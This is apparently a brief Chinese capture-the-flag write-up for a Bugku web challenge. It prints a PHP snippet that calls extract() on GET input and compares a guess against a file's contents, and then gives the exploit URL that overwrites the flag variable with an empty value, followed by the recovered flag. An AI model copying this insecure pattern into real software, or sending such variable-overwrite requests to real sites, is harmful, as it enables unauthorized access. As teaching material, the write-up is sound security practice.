gaonuoqi
<?php
$flag=\'xxx\';
extract($_GET);
if(isset($shiyan))
{
$content=trim(file_get_contents($flag));
if($shiyan==$content)
{
echo\'flag{xxx}\';
}
else
{
echo\'Oh.no\';
}
}
?>

file_get_contents() 函数把整个文件读入一个字符串中。

extract() 函数从数组中将变量导入到当前的符号表。

 

大概就是将flag变量与shiyan变量一致得到flag

将contents内容为空,flag和shiyan变量为空,满足条件

http://123.206.87.240:9009/1.php?shiyan=&flag=

 

flag{bugku-dmsj-p2sm3N}

分类:

技术点:

相关文章:

  • 2022-12-23
  • 2021-12-24
  • 2021-11-16
  • 2021-06-18
  • 2021-12-24
  • 2021-12-20
猜你喜欢
  • 2021-04-09
  • 2021-12-24
  • 2021-10-19
  • 2021-12-24
  • 2021-12-24
  • 2021-06-09
相关资源
相似解决方案